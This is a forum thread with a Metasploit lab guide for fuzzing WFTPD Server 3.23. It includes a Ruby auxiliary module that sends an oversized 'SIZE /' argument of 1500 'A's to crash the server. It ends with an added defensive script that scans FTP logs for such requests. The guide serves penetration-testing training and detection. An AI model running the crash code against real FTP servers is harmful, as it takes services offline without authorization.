Thread: Adding another module to the Metasploit Unleashed course, exploit development

    I am transferring this over from the old RE forums, because I think it's a helpful guide for those interested in adding another application to the exploit module in the Metasploit Unleashed - Mastering the Framework course. The guide also goes into detail about exploit development using Metasploit. This guide is not part of the course, and the author cannot be held responsible if the subsequent modules from the Metasploit Unleashed course no longer work or conflict with the initial setup. Here is the original post:

    I did the Metasploit Unleashed course over the holiday weekend and I want to say WOW! Amazing work, enjoyed it so much!

    I wanted to add another application to fuzz and exploit for my own lab, and then I ended up getting carried away and wrote a small guide/module for the course. It plays off the existing modules. There's nothing really 'spectacular' about the guide especially in comparison to the course, but it brings up a good point that happened to me when I installed the FTP server and tried to exploit it.

    Simple FTP Fuzzer

    Remember the carpenter's mantra: measure twice, cut once? Well, the same can be applied to creating exploits. We'll take for example our target running WFTPD Server 3.23 on our XP machine.

    First, we'll go ahead and download the software:

    If you installed the FTP server in Windows components, please uninstall it before installing the software. Go to the Control Panel and open 'Add or Remove Programs'. Select 'Add/Remove Windows Components' on the left-hand side. Double click on 'Internet Information Services (IIS)' and un-check 'File Transfer Protocol FTP Service'.

    Install the software, add an FTP user and password with full rights and enable logging.

    After running our enumeration scans we see this exploit is already written in Metasploit and decide to go ahead and try it. Set the options and payload and run the exploit. Also make sure to specify the target as it defaults to Windows 2000 Pro SP4.

    And the results are....."Exploit completed, but no session was created."

    Well...we got a crash, but no bind shell. In fact, if we were doing a pentest and that was our only way into the network, we just blew it! The application would have to be reset for us to get another shot! This is where 'measure twice, cut once' comes into play. A good rule of thumb is to always test your exploits before firing them off. Create a lab, as we've done, and test it before you try it on the actual target. The great thing about Metasploit is that it allows you to reuse and modify code very easily. We see the exploit that was already built in doesn't work, so we are going to have to fix it!

    If we hook a debugger up we see the crash comes right at the jump code. Normally a simple fix would be just to change the jump code, since the current one does not appear to work. Since we want to be thorough, we are going to test this exploit from scratch, using our previously made IMAP fuzzer. First we'll go ahead and make a few minor changes in the code.

    root@BT4VM:/pentest/exploits/framework3/modules/auxiliary/fuzzers# chmod 755 ftpfuzz.rb
    root@BT4VM:/pentest/exploits/framework3/modules/auxiliary/fuzzers# cat ftpfuzz.rb
    # This file is part of the Metasploit Framework and may be subject to
    # redistribution and commercial restrictions. Please see the Metasploit
    # Framework web site for more information on licensing and terms of use.
    require 'msf/core'

    class Metasploit3 < Msf::Auxiliary
        include Msf::Exploit::Remote::Ftp
        include Msf::Auxiliary::Dos

        def initialize
            super(
                'Name'           => 'Simple FTP Fuzzer',
                'Description'    => %q{
                                    An example of how to build a simple FTP fuzzer.
                                    Account FTP credentials are required in this fuzzer.
                },
                'Author'         => [ 'ryujin' ],
                'License'        => MSF_LICENSE,
                'Version'        => '$Revision: 1 $'
            )
        end

        # Random alphanumeric string, carried over from the IMAP fuzzer this module is based on
        def fuzz_str()
            return Rex::Text.rand_text_alphanumeric(rand(1024))
        end

        def run()
            while (true)
                # connect_login comes from the Ftp mixin and uses the FTPUSER/FTPPASS options
                connected = connect_login()
                if not connected
                    print_status("Host is not responding - this is G00D ;)")
                    break
                end
                print_status("Generating fuzzed data...")
                # Fixed buffer of 1500 'A's, the same "SIZE /" + long string the original exploit sends
                fuzzed = "\x41" * 1500
                print_status("Sending fuzzed data, buffer length = %d" % fuzzed.length)
                req = "SIZE /" + fuzzed + "\r\n"
                res = raw_send_recv(req)
                if !res.nil?
                    print_status(res)
                else
                    print_status("Server crashed, no response")
                    break
                end
                disconnect()
            end
        end
    end

    We see that only a few minor changes are needed. The original exploit uses the "SIZE" command followed by "/" and a long character string. We know this portion of the code works, since we were able to crash the application. This can be verified by looking at the original code or by inspecting the packets sent over the network with Wireshark.

    cat /pentest/exploits/framework3/modules/exploits/windows/ftp/wftpd_size.rb

    Let's go ahead and fire Metasploit back up and see how this looks.

    Last edited by Lincoln; 01-21-2010 at 07:50 PM.
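The post has the reader enable logging on the FTP server and then sends a 1500-byte "SIZE /" argument at it. As an added example that is not part of the original post, the course, or Metasploit, here is a small Ruby check that runs over server log lines and flags that kind of request, so the same lab can be used to confirm the defender's side sees it. The log format, client addresses, sample lines and thresholds below are all constructed for this example; a real server's log format will differ, so adapt LOG_LINE to match it.

```ruby
# Added example (not part of the original post or of Metasploit): a log-side
# check that flags command arguments shaped like the fuzzer's input.
# Constructed log format: "<timestamp> <client ip> <command> <argument>"
# (hypothetical; adjust the regex to the real server's log layout).
LOG_LINE = /\A(?<ts>\S+)\s+(?<ip>\d{1,3}(?:\.\d{1,3}){3})\s+(?<cmd>[A-Z]{3,4})(?:\s+(?<arg>.*))?\z/

# Assumed thresholds: the crashing request in the post carries 1500 bytes,
# so anything over a few hundred bytes, or a long run of one byte, is worth a look.
MAX_ARG_LEN = 256
MAX_REPEAT  = 64

# Parse one line into a Hash, or return nil if it does not match the format.
def parse_ftp_log_line(line)
  m = LOG_LINE.match(line.chomp)
  return nil unless m
  { ts: m[:ts], ip: m[:ip], cmd: m[:cmd], arg: m[:arg].to_s }
end

# Reasons an argument looks like fuzz input rather than a real path.
def suspicious_reasons(arg, max_len: MAX_ARG_LEN, max_repeat: MAX_REPEAT)
  reasons = []
  reasons << "argument length #{arg.bytesize} > #{max_len}" if arg.bytesize > max_len
  # A run of a single repeated byte (e.g. "AAAA...") is the classic overflow probe.
  runs = arg.scan(/(.)\1{#{max_repeat - 1},}/)
  reasons << "run of repeated byte #{runs.first.first.inspect}" unless runs.empty?
  reasons << "non-printable bytes in argument" if arg =~ /[^[:print:]]/
  reasons
end

# Walk the log and group findings per client, so a burst of oversized SIZE
# commands from one host stands out from a single stray entry.
def scan_ftp_log(lines)
  findings = Hash.new { |h, k| h[k] = [] }
  lines.each do |line|
    rec = parse_ftp_log_line(line)
    next unless rec
    reasons = suspicious_reasons(rec[:arg])
    next if reasons.empty?
    findings[rec[:ip]] << { ts: rec[:ts], cmd: rec[:cmd], reasons: reasons }
  end
  findings
end

# Constructed sample log: two normal commands, then what the fuzzer sends.
SAMPLE_LOG = [
  "2010-01-21T19:40:01Z 192.0.2.10 USER ftpuser",
  "2010-01-21T19:40:02Z 192.0.2.10 SIZE /readme.txt",
  "2010-01-21T19:40:03Z 192.0.2.50 SIZE /" + ("A" * 1500),
  "2010-01-21T19:40:04Z 192.0.2.50 SIZE /" + ("A" * 1500),
  "garbage line that does not parse",
]

if __FILE__ == $PROGRAM_NAME
  scan_ftp_log(SAMPLE_LOG).each do |ip, hits|
    puts "#{ip}: #{hits.size} suspicious command(s)"
    hits.each { |h| puts "  #{h[:ts]} #{h[:cmd]}: #{h[:reasons].join('; ')}" }
  end
end
```

Run it as a script and it reports the two oversized SIZE requests from 192.0.2.50 with both the length and repeated-byte reasons, while the ordinary USER and SIZE lines and the unparseable line produce nothing. Grouping by client address is the point: one long argument may be a typo, but several in a row from the same host is the pattern the post's fuzzer produces.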